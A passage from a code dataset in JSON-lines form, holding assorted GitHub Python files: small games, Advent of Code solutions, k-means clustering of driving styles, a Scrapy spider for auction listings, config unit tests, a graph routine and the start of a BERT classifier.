alive_count == 3:\n grid = enable_cell(grid, i, j)\n elif alive_count == 4:\n grid = disable_cell(grid, i, j)\n return grid\n\n\ndef is_inside(point, cell):\n dl = cell.getP1() # down left corner\n ur = cell.getP2() # up right corner\n return dl.getX() < point.getX() < ur.getX() and dl.getY() < point.getY() < ur.getY()\n\n\ndef feel_click(grid, point, dim):\n for i in range(dim):\n for j in range(dim):\n if is_inside(point, grid[i][j]):\n enable_cell(grid, point.getX().__int__(), point.getY().__int__())\n return grid\n\n\ndef get_kbinput():\n global flag\n keystrk = input('Press a key \\n')\n # key doesn't continue until key is pressed\n print(\"You just pressed: \", keystrk)\n flag = False\n print('flag: ', flag)\n\ndef get_clicks(grid):\n global flag\n while flag:\n click_point = win.getMouse()\n grid = feel_click(grid, click_point, DIM)\n\n\nDIM = 32\n\nwin = GraphWin(\"grid\", 600, 600)\nwin.setCoords(0, 0, DIM, DIM)\n\n# default grid init\ngrid = init_grid(DIM)\n\ngrid = enable_cell(grid, 20, 20)\ngrid = enable_cell(grid, 21, 18)\ngrid = enable_cell(grid, 23, 18)\ngrid = enable_cell(grid, 22, 18)\ngrid = enable_cell(grid, 21, 20)\n\n# draw\ndraw_grid(grid, DIM, win)\n\n# live cells init todo: add enable cells by mouse clicking\n# flag = True\n# main_loop = threading.Thread(target=get_clicks, args=[grid])\n# exit_loop = threading.Thread(target=get_kbinput)\n#\n# main_loop.start()\n# exit_loop.start()\n\n# update cycle\nsleep(2)\nwhile True:\n grid = update_grid(grid, DIM)\n sleep(0.25)\n","repo_name":"TrueCookie/CtapooPy","sub_path":"cgol.py","file_name":"cgol.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35762098435","text":"\"\"\"\nScript for running FizzBuzz game.\n\nFizzBuzz game:\n1) From 1 to max number, numbers are output\n2) If the number is divisible by 3 without remainder, it is replaced by «Fizz»\n3) If the number is divisible by 5 without remainder, it is replaced by «Buzz»\n4) If the number is divisible by 3 and 5 without remainder,\nit is replaced by «FizzBuzz»\n\nExample:\nFor max number is 16 the output will be:\n1, 2, Fizz, 4, Buzz, Fizz, 7, 8, Fizz, Buzz, 11, Fizz, 13, 14, FizzBuzz, 16\n\nReplacement options:\nInstead of 3, 5 and Fizz, Buzz can be other digits and strings\n\n\"\"\"\n\n\nclass FizzBuzzRunner:\n \"\"\"Run FizzBuzz game and print result strings\"\"\"\n\n __DEFAULT_REPLACEMENT_OPTIONS = {3: 'Fizz', 5: 'Buzz'}\n\n def __init__(self, max_number: int, replacement_options=None):\n if not replacement_options:\n replacement_options = self.__DEFAULT_REPLACEMENT_OPTIONS\n\n self.__max_number = max_number\n self.__replacement_options = replacement_options\n\n @staticmethod\n def __is_divided_without_remainder(divisible: int, divider: int) -> bool:\n \"\"\"True if divisible divide to divider without remainder.\n\n For example:\n 1) 6 % 3 - True\n 2) 10 % 5 - True\n 3) 7 % 3 - False\n 4) 11 % 5 - False\n\n \"\"\"\n\n return divisible % divider == 0\n\n def __get_string_or_number(self, number: int) -> str | int:\n \"\"\"Return string (if number divide without remainder) or number.\n\n Example for __replacement_options = {3: 'Fizz', 5: 'Buzz'}:\n 1) number = 2 -> return 2\n 2) number = 3 -> return Fizz\n 3) number = 5 -> return Buzz\n 4) number = 15 -> return FizzBuzz\n\n \"\"\"\n\n string = ''\n\n for digit, replacement_string in self.__replacement_options.items():\n if self.__is_divided_without_remainder(number, digit):\n string += replacement_string\n\n return string or number\n\n def __print_game_title(self) -> None:\n \"\"\"Print game's title\"\"\"\n\n print(\n f'\\nFizzBuzz with {self.__max_number} limit number and '\n f'{self.__replacement_options} options \\n'\n )\n\n @property\n def __result_values(self) -> tuple:\n \"\"\"Return result values after FizzBuzz running\"\"\"\n\n values = []\n\n for number in range(1, self.__max_number + 1):\n values.append(self.__get_string_or_number(number))\n\n return tuple(values)\n\n def run(self) -> None:\n \"\"\"Run game and print results\"\"\"\n\n self.__print_game_title()\n\n for value in self.__result_values:\n print(value)\n\n\nif __name__ == '__main__':\n FizzBuzzRunner(16).run()\n FizzBuzzRunner(28, {4: 'Argh', 7: 'Blergh'}).run()\n","repo_name":"OsnovaDT/FizzBuzz_script","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22365882387","text":"import numpy as np\n#np.set_printoptions(precision=2)\n\nimport pandas as pd\n\nfrom typing import Any, Dict, List, Tuple, NoReturn\n\nimport argparse\nimport os\nimport pickle\n\nfrom sklearn.cluster import KMeans\n\ndef parse_arguments() -> Any:\n\t\"\"\"Parse command line arguments.\"\"\"\n\n\tparser = argparse.ArgumentParser()\n\t\n\tparser.add_argument(\n\t\t\"--data_dir\",\n\t\trequired=True,\n\t\ttype=str,\n\t\thelp=\"Directory where the features (npy files) are saved\",\n\t)\n\n\tparser.add_argument(\n\t\t\"--model_dir\",\n\t\trequired=True,\n\t\ttype=str,\n\t\thelp=\"Directory where the model is saved\",\n\t)\n\n\tparser.add_argument(\n\t\t\"--result_dir\",\n\t\trequired=True,\n\t\ttype=str,\n\t\thelp=\"Directory where the model is saved\",\n\t)\n\n\n\tparser.add_argument(\"--mode\",\n\t\t\t\t\t\trequired=True,\n\t\t\t\t\t\ttype=str,\n\t\t\t\t\t\thelp=\"train/val/test\",\n\t\t\t\t\t\tchoices=['train', 'test', 'val'])\n\n\tparser.add_argument(\"--obs_len\",\n\t\t\t\t\t\tdefault=2,\n\t\t\t\t\t\ttype=int,\n\t\t\t\t\t\thelp=\"Observed length of the trajectory in seconds\",\n\t\t\t\t\t\tchoices=[1,2,3,4,5])\n\n\tparser.add_argument(\"--filter\",\n\t\t\t\t\t\tdefault='ekf',\n\t\t\t\t\t\ttype=str,\n\t\t\t\t\t\thelp=\"Filter to process the data noise. (ekf/none/ekf-savgol/savgol\",\n\t\t\t\t\t\tchoices=['ekf', 'none', 'ekf-savgol', 'savgol'])\n\n\treturn parser.parse_args()\n\n\ndef train(data:np.ndarray,\n\t\t obs_len:int,\n\t\t filter_name:str,\n\t\t model_dir:str,\n\t\t result_dir:str,\n\t\t save_model:bool=True)->NoReturn:\n\t\n\tprint('[k-means][train] creating kmeans model...')\n\n\tkmeans = KMeans(n_clusters=3,\n\t\t\t\t\tinit='k-means++',\n\t\t\t\t\tmax_iter=1000,\n\t\t\t\t\ttol=1e-5,\n\t\t\t\t\trandom_state=7,\n\t\t\t\t\talgorithm=\"elkan\")\n\n\tprint('[k-means][train] training...')\n\n\t_y = kmeans.fit_predict(X=data)\n\t_y = np.expand_dims(_y, axis=1)\n\n\tprint('[k-means][train] clusters:')\n\tfor i, c in zip(range(1, 4), kmeans.cluster_centers_):\n\t\tprint (f'\\tc_{i}: {c}')\n\n\tprint('[k-means][train] results:')\n\t_c, _l = np.unique(_y, return_counts=True)\n\tfor i, c in zip(_c,_l):\n\t\tprint (f'\\tc_{i}: {c}')\n\n\tif save_model:\n\t\tmodel_file=f'kmeans_{obs_len}s_{filter_name}.pkl'\n\t\tprint (f'[k-means][train] saving model ({model_file})...')\n\t\twith open(os.path.join(model_dir, model_file), 'wb') as f:\n\t\t\tpickle.dump(kmeans, f)\n\n\n\tresult_file = f'results_kmeans_train_{obs_len}s_{filter_name}.csv'\n\tprint (f'[k-means][train] saving results ({result_file})...')\n\tlabels = ['mean_velocity', \n\t\t\t 'mean_acceleration', \n\t\t\t 'mean_deceleration', \n\t\t\t 'std_lateral_jerk', \n\t\t\t 'driving_style']\n\n\tresult = np.concatenate((data, _y), axis=1)\n\tdf = pd.DataFrame(data=result, columns=labels)\n\tdf.to_csv(os.path.join(result_dir,result_file))\n\n\tresult_file = result_file.replace('results', 'centers').replace('csv', 'txt')\n\tprint (f'[k-means][train] saving results ({result_file})...')\n\tnp.savetxt(os.path.join(result_dir, result_file), \n\t\t\t kmeans.cluster_centers_, \n\t\t\t fmt='%.8f',\n\t\t\t delimiter=',')\n\n\ndef process(data:np.ndarray,\n\t\t obs_len:int,\n\t\t filter_name:str,\n\t\t model_dir:str,\n\t\t result_dir:str,\n\t\t mode:str)->NoReturn:\n\n\tmodel_file=f'kmeans_{obs_len}s_{filter_name}.pkl'\n\tassert os.path.exists(os.path.join(model_dir, model_file)),\\\n\t\tf'[K-Means][{mode}][ERROR] model not found! ({model_file})'\n\n\tprint(f'[k-means][{mode}] loading the model...')\n\tkmeans = None\n\twith open(os.path.join(model_dir, model_file), 'rb') as f:\n\t\t\tkmeans = pickle.load(f)\n\t\n\tassert kmeans is not None,\\\n\t\tf'[K-Means][{mode}][ERROR] error while loading model! ({model_file})'\n\n\t_y = kmeans.predict(X=data)\n\t_y = np.expand_dims(_y, axis=1)\n\n\tprint(f'[k-means][{mode}] clusters:')\n\tfor i, c in zip(range(1, 4), kmeans.cluster_centers_):\n\t\tprint (f'\\tc_{i}: {c}')\n\n\tprint(f'[k-means][{mode}] results:')\n\t_c, _l = np.unique(_y, return_counts=True)\n\tfor i, c in zip(_c,_l):\n\t\tprint (f'\\tc_{i}: {c}')\n\n\t\n\tresult_file = f'results_kmeans_{mode}_{obs_len}s_{filter_name}.csv'\n\tprint (f'[k-means][{mode}] saving results ({result_file})...')\n\tlabels = ['mean_velocity', \n\t\t\t 'mean_acceleration', \n\t\t\t 'mean_deceleration', \n\t\t\t 'std_lateral_jerk', \n\t\t\t 'driving_style']\n\n\tresult = np.concatenate((data, _y), axis=1)\n\tdf = pd.DataFrame(data=result, columns=labels)\n\tdf.to_csv(os.path.join(result_dir,result_file))\n\n\n\nif __name__ == '__main__':\n\n\t'''\n\t\tapply K-means clustering to classify the data into\n\t\tdriving styles (calm, moderate, aggresive)\n\t'''\n\n\tprint ('[K-means] running....') \n\n\targs = parse_arguments()\n\n\n\tif args.mode == 'test':\n\t\targs.obs_len = 2\n\t\t\n\tassert os.path.exists(args.data_dir),\\\n\t\tf'[K-means][main][ERROR] data_dir not found!({args.data_dir})'\n\n\tdata_file = 'features_{}_{}s_{}.npy'.format(args.mode,\n\t\t\t\t \t\t\t\t\t\t\t\targs.obs_len,\n\t\t\t\t \t\t\t\t\t\t\t\targs.filter)\n\tdata_file = os.path.join(args.data_dir, data_file)\n\n\tassert os.path.exists(data_file),\\\n\t\tf'[K-means][main][ERROR] data_file not found!({data_file})'\n\n\tprint ('[K-means] loading dataset....')\n\t# (m, 4)\n\t# [mean_v, mean_acc, mean_deac, std_jy]\n\tdata = np.load(os.path.join(args.data_dir,data_file))\n\n\tif args.mode == 'train':\n\t\ttrain(data=data,\n\t\t\t save_model=True,\n\t\t\t obs_len=args.obs_len,\n\t\t\t filter_name=args.filter,\n\t\t\t model_dir=args.model_dir,\n\t\t\t result_dir=args.result_dir)\n\n\telif args.mode == 'test':\n\t\tprocess(data=data,\n\t\t\t obs_len=args.obs_len,\n\t\t\t filter_name=args.filter,\n\t\t\t model_dir=args.model_dir,\n\t\t\t result_dir=args.result_dir,\n\t\t\t mode='test')\n\n\telse:#val\n\t\tprocess(data=data,\n\t\t\t obs_len=args.obs_len,\n\t\t\t filter_name=args.filter,\n\t\t\t model_dir=args.model_dir,\n\t\t\t result_dir=args.result_dir,\n\t\t\t mode='val')\n","repo_name":"iag0g0mes/t2fis_driving_style","sub_path":"clustering/kmean.py","file_name":"kmean.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"44"} +{"seq_id":"7893797968","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 17 21:48:15 2020\r\n\r\n@author: Ercan Karaçelik\r\n\"\"\"\r\n\r\n\r\n'''\r\nPDB module \r\n\r\nThe module pdb defines an interactive source code debugger for Python programs.\r\n\r\n'''\r\n\r\nimport pdb\r\n\r\n\r\ndef add(L):\r\n '''\r\n Adds the integer items of a list\r\n '''\r\n size =len(L)\r\n total=0\r\n iterator=0\r\n pdb.set_trace()\r\n while iterator < size:\r\n total +=L[iterator]\r\n iterator+=1\r\n print(f'Iterator is {iterator} total is {total}')\r\n return total\r\n\r\nmy_list=[1,2,3,4,5]\r\nadd(my_list)","repo_name":"Ercion/learning_python","sub_path":"pdb_module_debugging.py","file_name":"pdb_module_debugging.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34154008457","text":"import re\nfrom collections import deque\nimport sys\nfrom copy import copy, deepcopy\nfrom collections import defaultdict\nfrom lark import Lark\n\n\ndef readFile(file):\n with open(file, 'r') as f:\n return f.readlines()\n\n\nlines = readFile('E:\\\\Projects\\\\AdventOfCode2020\\\\d20\\\\input.txt')\n\ni = 0\ntiles = defaultdict(lambda: defaultdict(list))\n\nwhile i < len(lines):\n l = lines[i].strip()\n if 'Tile' in l:\n tile_id = l.split('Tile')[1][:-1].strip()\n i += 1\n tile = lines[i:i+10]\n for index, line in enumerate(tile):\n line = line.strip()\n for c in line:\n tiles[tile_id][index].append(c)\n i += 10\n # print(tiles[tile_id])\n\n i += 1\n\n\nb_tiles = {}\nseen = defaultdict(int)\nfor tile_id in tiles.keys():\n top = ''\n left = ''\n right = ''\n bottom = ''\n for index in tiles[tile_id]:\n line = tiles[tile_id][index]\n if index == 0:\n top = ''.join(line)\n if index == 9:\n bottom = ''.join(line)\n left += line[0]\n right += line[-1]\n\n trans = str.maketrans('#.', '10')\n top = top.translate(trans)\n bottom = bottom.translate(trans)\n right = right.translate(trans)\n left = left.translate(trans)\n b_top = int(top, 2)\n b_bottom = int(bottom, 2)\n b_right = int(right, 2)\n b_left = int(left, 2)\n\n r_top = top[::-1]\n r_bottom = bottom[::-1]\n r_right = right[::-1]\n r_left = left[::-1]\n b_r_top = int(r_top, 2)\n b_r_bottom = int(r_bottom, 2)\n b_r_right = int(r_right, 2)\n b_r_left = int(r_left, 2)\n\n b_tiles[tile_id] = [[b_top, b_bottom, b_right, b_left],\n [b_r_top, b_r_bottom, b_r_right, b_r_left]]\n for v in [b_top, b_bottom, b_right, b_left]:\n seen[v] += 1\n for v in [b_r_top, b_r_bottom, b_r_right, b_r_left]:\n seen[v] += 1\n # seen.update([b_top, b_bottom, b_right, b_left])\n # seen.update([b_r_top, b_r_bottom, b_r_right, b_r_left])\n\n # print(top, bottom, right, left)\n # temp = line.translate(str.maketrans('#.', '10'))\n # print(int(temp, 2))\n # print(temp)\n\nresult = 1\nmin_count = sys.maxsize\n\nfor tile_id in b_tiles.keys():\n order_1 = b_tiles[tile_id][0]\n order_2 = b_tiles[tile_id][1]\n count_1 = -1\n count_2 = -1\n for value in order_1:\n count_1 += seen[value]\n for value in order_2:\n if value in seen.keys():\n count_2 += seen[value]\n # print(tile_id)\n # print(count_1, count_2)\n if count_1 < min_count:\n min_count = count_1\n result = int(tile_id)\n elif count_1 == min_count:\n result *= int(tile_id)\n\nprint(result)\n","repo_name":"Hamza141/AdventOfCode2020","sub_path":"d20/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1171590183","text":"from django.conf import settings\nfrom django.contrib.sites.models import Site\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\nfrom geositeserver.models import GeositeMap\n\ndef geositeserver(request):\n \"\"\"Global values to pass to templates\"\"\"\n site = Site.objects.get_current()\n defaults = dict(\n STATIC_URL=settings.STATIC_URL,\n VERSION=\"2.0.0\",\n SITE_NAME=site.name,\n SITE_DOMAIN=site.domain,\n DEBUG_STATIC=getattr(\n settings,\n \"DEBUG_STATIC\",\n False),\n GEOSITE_SERVER_STATIC_VERSION=settings.GEOSITE_SERVER_STATIC_VERSION,\n GEOSITE_SERVER_STATIC_DEBUG=settings.GEOSITE_SERVER_STATIC_DEBUG,\n GEOSITE_DASHBOARDS_TYPEAHEAD=json.dumps([{'id': d.slug, 'text': d.title} for d in GeositeMap.objects.all().order_by('title')])\n )\n\n return defaults\n","repo_name":"wfp-ose/geosite-server","sub_path":"geositeserver/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"14236263827","text":"import copy\n\n# Get the puzzle input, 10a for the example and 10b for the puzzle inputs\nwith open('Day10b.txt') as f:\n adapt = []\n for line in f.readlines():\n adapt.append(int(line.strip()))\n\n# Make a copy of adapt to work with it\nadapters = copy.deepcopy(adapt)\n\n# Initiate a variable to track joltage, single jolts, and triple jolts\njoltage = 0\none_jolt = 0\nthree_jolt = 1\n\n# Get the max size of the adapter in your bag\nmax_adapt = max(adapters)\n\n# While adapter has items in it\nwhile adapters:\n choices = []\n # Look for adapters that are within 3 of the current joltage\n for adapter in adapters:\n if adapter <= joltage + 3:\n choices.append(adapter)\n # Get the difference of the lowest possible number and the current joltage\n diff = min(choices) - joltage\n # Update the 1- and 3-jolt differences as appropriate\n if diff == 1:\n one_jolt += 1\n elif diff == 3:\n three_jolt += 1\n # Update the joltage to equal the lowest of the choices\n joltage = min(choices)\n # Remove the new adapter from the list of adapters\n adapters.remove(min(choices))\n\n# This is the solution to part 1\nprint(f'The product of 1-jolt and 3-jolt differences is {one_jolt * three_jolt}.')\n\n# Create a new copy of the adapters, add 0 and the device (max + 3)\nperms = copy.deepcopy(adapt)\nperms.append(0)\nperms.append(max(perms)+3)\n\n# Sort the list of adapters\nsort_perms = sorted(perms)\n\n# Intiate a variable to multiple the possible permutations\nperm = 1\n\n# Initiate a variable to track the lines and a list to make checks\nline = 0\nchecks = []\n\n# While the line counter is below the length of sorted list\nwhile line < len(sort_perms) - 1:\n # Check to see if the next number in the list is 1 to 2 away\n if sort_perms[line + 1] - sort_perms[line] < 3:\n # If it is add it to checks list and increment the line\n checks.append(sort_perms[line])\n line += 1\n else:\n # Add the current line to the list, it's within 2 of the previous\n checks.append(sort_perms[line])\n # Check the length of check to get the possible permutations\n if len(checks) == 5:\n # Multiply it by the current number of permutations\n perm *= ((2**3) - 1)\n elif len(checks) == 4 or len(checks) == 3:\n perm *= (2**(len(checks) - 2))\n # Empty checks to start the process again\n checks = []\n # Increment the lines\n line += 1\n\n# This is the solution for part 2\nprint(f'The total number of permutation is {perm}.')\n\n\n \n","repo_name":"PNJaenichen/AdventOfCode","sub_path":"2020_AOC/Day10.py","file_name":"Day10.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16958732043","text":"from time import time\nfrom ggame.mathapp import MathApp, _MathDynamic\n\nclass Timer(_MathDynamic):\n \n def __init__(self):\n super().__init__()\n self.once = []\n self.callbacks = {}\n self.reset()\n self.step()\n self.next = None\n MathApp._addDynamic(self) # always dynamically defined\n \n def reset(self):\n \"\"\"\n Set the reference time to the MathApp current time. If the timer is used\n or initialized before the app, then set the reference time to match the\n system time instead.\n \n :returns: None\n \"\"\"\n self._reset = MathApp.time\n if not self._reset:\n self._reset = time.time()\n \n def step(self):\n nexttimers = []\n calllist = []\n self.time = MathApp.time - self._reset\n while self.once and self.once[0][0] <= MathApp.time:\n tickinfo = self.once.pop(0)\n if tickinfo[1]: # periodic?\n nexttimers.append((tickinfo[1], self.callbacks[tickinfo][0])) # delay, callback\n calllist.append(self.callbacks[tickinfo].pop(0)) # remove callback and queue it\n if not self.callbacks[tickinfo]: # if the callback list is empty\n del self.callbacks[tickinfo] # remove the dictionary entry altogether\n for tickadd in nexttimers:\n self.callAfter(tickadd[0], tickadd[1], True) # keep it going\n for call in calllist:\n call(self)\n\n def callAfter(self, delay, callback, periodic=False):\n key = (MathApp.time + delay, delay if periodic else 0)\n self.once.append(key)\n callbacklist = self.callbacks.get(key, [])\n callbacklist.append(callback)\n self.callbacks[key] = callbacklist\n self.once.sort()\n \n def callAt(self, time, callback):\n self.callAfter(time-self.time, callback)\n \n def callEvery(self, period, callback):\n self.callAfter(period, callback, True)\n\n def __call__(self):\n return self.time\n\n","repo_name":"mdecd2023/2a3-pj3ag1","sub_path":"cmsimde/static/ggame/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"42981130296","text":"import unittest\n\nimport os\n\nimport json\n\nfrom ridt.config import ConfigFileParser\nfrom ridt.config.ridtconfig import ConsistencyError\n\nfrom ridt.config.configfileparser import ConfigFileParserValidationError\n\n\nclass ST11(unittest.TestCase):\n\n \"\"\"System Test 11. Test the system can convert\n config files with ranges of values into a set of\n config object, each which can be evaluated separately.\"\"\"\n\n def setUp(self) -> None:\n\n \"\"\"setUp method that instantiates the\n :class:`~.RIDTConfig` class.\"\"\"\n\n this_dir = os.path.dirname(os.path.abspath(__file__))\n self.config_path = os.path.join(this_dir, \"st06/config.json\")\n with open(self.config_path) as f:\n self.default = json.load(f)\n\n this_dir = os.path.dirname(os.path.abspath(__file__))\n path = os.path.join(this_dir, \"../../default/config.json\")\n with ConfigFileParser(path) as cfp:\n self.c = cfp\n\n def tearDown(self) -> None:\n\n with open(self.config_path, \"w\") as w:\n json.dump(self.default, w)\n\n def test_verify(self):\n\n \"\"\"Verify that the :class:`~.ContourPlots` class\n has the correct scale and range attributes.\"\"\"\n\n self.assertEqual(\n hasattr(self.c.models.eddy_diffusion.planes_plots, \"range\"), True\n )\n self.assertEqual(\n hasattr(self.c.models.eddy_diffusion.planes_plots, \"scale\"), True\n )\n\n def test_contours(self):\n\n with self.assertRaises(ConfigFileParserValidationError):\n with open(self.config_path) as f:\n config = json.load(f)\n config[\"models\"][\"eddy_diffusion\"][\"planes_plots\"][\"contours\"][\"min\"] = \\\n config[\"models\"][\"eddy_diffusion\"][\"planes_plots\"][\"contours\"][\"max\"] + 1\n with open(self.config_path, \"w\") as f:\n json.dump(config, f)\n ConfigFileParser(self.config_path)\n\n def test_range(self):\n\n with self.assertRaises(ConfigFileParserValidationError):\n with open(self.config_path) as f:\n config = json.load(f)\n config[\"models\"][\"eddy_diffusion\"][\"planes_plots\"][\"range\"] = \"test\"\n with open(self.config_path, \"w\") as f:\n json.dump(config, f)\n ConfigFileParser(self.config_path)\n\n def test_scale(self):\n\n with self.assertRaises(ConfigFileParserValidationError):\n with open(self.config_path) as f:\n config = json.load(f)\n config[\"models\"][\"eddy_diffusion\"][\"planes_plots\"][\"scale\"] = \"test\"\n with open(self.config_path, \"w\") as f:\n json.dump(config, f)\n ConfigFileParser(self.config_path)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"riskaware-ltd/ridt","sub_path":"ridt/tests/systemtests/test_st09.py","file_name":"test_st09.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"18830243136","text":"import scrapy\nimport pandas as pd\ndf = pd.read_csv('F:\\Web Scraping\\Golabal\\keywords.csv')\nbase_url = 'https://auctionresource.com/Search?sort=&fromDate=&toDate=&category=&manufacturer=&model=&q={}&zipCode=&distance=&page=1'\n\nclass ResourceSpider(scrapy.Spider):\n name = 'resource'\n def start_requests(self):\n for index in df:\n yield scrapy.Request(base_url.format(index), meta={\"pyppeteer\": True},cb_kwargs={'index':index})\n\n def parse(self, response, index):\n total_pages = response.xpath('//*[@id=\"pageForm\"]/div/select/option[last()]/text()').get() \n current_page = \"\"\n try:\n current_page =response.css('[selected]::text').extract()[1] \n # print(current_page)\n except:\n pass \n link = response.url\n \n if total_pages and current_page:\n if int(current_page) ==1:\n for i in range(2, int(total_pages)+1): \n min = 'page='+str(i-1)\n max = 'page='+str(i)\n link = link.replace(min,max) \n # print(link) \n yield response.follow(link, cb_kwargs={'index':index})\n\n links = response.css(\"h3.hidden-xs a::attr(href)\")\n for link in links:\n yield response.follow(\"https://auctionresource.com\"+link.get(), callback=self.parse_item, cb_kwargs={'index':index}) \n \n def parse_item(self, response, index): \n print(\".................\") \n product_url = response.url\n print(product_url)\n image = response.css('img.img-responsive::attr(src)').get().strip()\n print(image)\n \n auction_date = response.css('.list-unstyled li::text').get().strip()\n print(auction_date)\n loc = response.xpath(\"//div[@class='card card-block card-primary']//div[2]/div[2]/text()\").get()\n location = loc.strip()\n print(location)\n product_name = response.css('h2.no-mt.mb-1::text').get().strip()\n print(product_name)\n lot = response.css('div h4::text').get().strip()\n lot_number = lot[5:]\n print(lot_number)\n auctioner = response.css('h3.section-title::text').get().strip()\n print(auctioner)\n description = response.css('div.card-block p::text').get().strip()\n print(description)\n \n yield{\n \n 'product_url' : response.url, \n 'item_type' :index.strip(), \n 'image_link' : image, \n 'auction_date' : auction_date, \n 'location' : location, \n 'product_name' : product_name, \n 'lot_id' : lot_number, \n 'auctioner' : auctioner,\n 'website' : 'auctionresource',\n 'description' : description \n }","repo_name":"Raoshan/auctionresource.com-scrapy-pyppeteer-python","sub_path":"auctionresource/spiders/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"32726632582","text":"class Graph:\n def __init__(self, V):\n self.V = V\n self.adj = [[] for i in range(V)]\n \n def addEdge(self, v, w):\n self.adj[v].append(w)\n self.adj[w].append(v)\n \n def connectedComponents(self):\n visited = []\n cc = []\n for i in range(self.V):\n visited.append(False)\n for v in range(self.V):\n if visited[v] == False:\n temp = []\n cc.append(self.DFS(temp, v, visited))\n return cc\n \n def DFS(self, temp, v, visited):\n visited[v] = True\n temp.append(v)\n for i in self.adj[v]:\n if visited[i] == False:\n temp = self.DFS(temp, i, visited)\n return temp\n \nif __name__ == '__main__':\n g = Graph(5)\n g.addEdge(1, 0)\n g.addEdge(2, 3)\n g.addEdge(3, 4)\n cc = g.connectedComponents()\n print(\"The connected componenets are: \")\n print(cc)\n","repo_name":"srishilesh/Data-Structure-and-Algorithms","sub_path":"Graphs/Number_of_connected_components.py","file_name":"Number_of_connected_components.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"13214795509","text":"import torch\nfrom torch import nn\nfrom transformers import BertPreTrainedModel, BertModel\nimport logging\nfrom typing import List, Optional, Tuple, Union\nfrom torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss\n\nfrom transformers.modeling_outputs import (\n BaseModelOutputWithPastAndCrossAttentions,\n BaseModelOutputWithPoolingAndCrossAttentions,\n CausalLMOutputWithCrossAttentions,\n MaskedLMOutput,\n MultipleChoiceModelOutput,\n NextSentencePredictorOutput,\n QuestionAnsweringModelOutput,\n SequenceClassifierOutput,\n TokenClassifierOutput,\n)\n\nfrom transformers.utils import (\n ModelOutput,\n add_code_sample_docstrings,\n add_start_docstrings,\n add_start_docstrings_to_model_forward,\n logging,\n replace_return_docstrings,\n)\n\nlogger = logging.get_logger(__name__)\n\n_CHECKPOINT_FOR_DOC = \"bert-base-uncased\"\n_CONFIG_FOR_DOC = \"BertConfig\"\n_TOKENIZER_FOR_DOC = \"BertTokenizer\"\n\n# SequenceClassification docstring\n_CHECKPOINT_FOR_SEQUENCE_CLASSIFICATION = \"textattack/bert-base-uncased-yelp-polarity\"\n_SEQ_CLASS_EXPECTED_OUTPUT = \"'LABEL_1'\"\n_SEQ_CLASS_EXPECTED_LOSS = 0.01\n\n\nBERT_INPUTS_DOCSTRING = r\"\"\"\n Args:\n input_ids (`torch.LongTensor` of shape `({0})`):\n Indices of input sequence tokens in the vocabulary.\n Indices can be obtained using [`BertTokenizer`]. See [`PreTrainedTokenizer.encode`] and\n [`PreTrainedTokenizer.__call__`] for details.\n [What are input IDs?](../glossary#input-ids)\n attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):\n Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:\n - 1 for tokens that are **not masked**,\n - 0 for tokens that are **masked**.\n [What are attention masks?](../glossary#attention-mask)\n token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):\n Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,\n 1]`:\n - 0 corresponds to a *sentence A* token,\n - 1 corresponds to a *sentence B* token.\n [What are token type IDs?](../glossary#token-type-ids)\n position_ids (`torch.LongTensor` of shape `({0})`, *optional*):\n Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,\n config.max_position_embeddings - 1]`.\n [What are position IDs?](../glossary#position-ids)\n head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):\n Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:\n - 1 indicates the head is **not masked**,\n - 0 indicates the head is **masked**.\n inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_size)`, *optional*):\n Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This\n is useful if you want more control over how to convert `input_ids` indices into associated vectors than the\n model's internal embedding lookup matrix.\n output_attentions (`bool`, *optional*):\n Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned\n tensors for more detail.\n output_hidden_states (`bool`, *optional*):\n Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for\n more detail.\n return_dict (`bool`, *optional*):\n Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.\n\"\"\"\n\n\nclass BertForCustomClassification(BertPreTrainedModel):\n def __init__(self, config):\n super().__init__(config)\n self.num_labels = config.num_labels\n self.config = config\n\n self.bert = BertModel(config)\n classifier_dropout = (\n config.classifier_dropout if config.classifier_dropout is not None else config.hidden_dropout_prob\n )\n 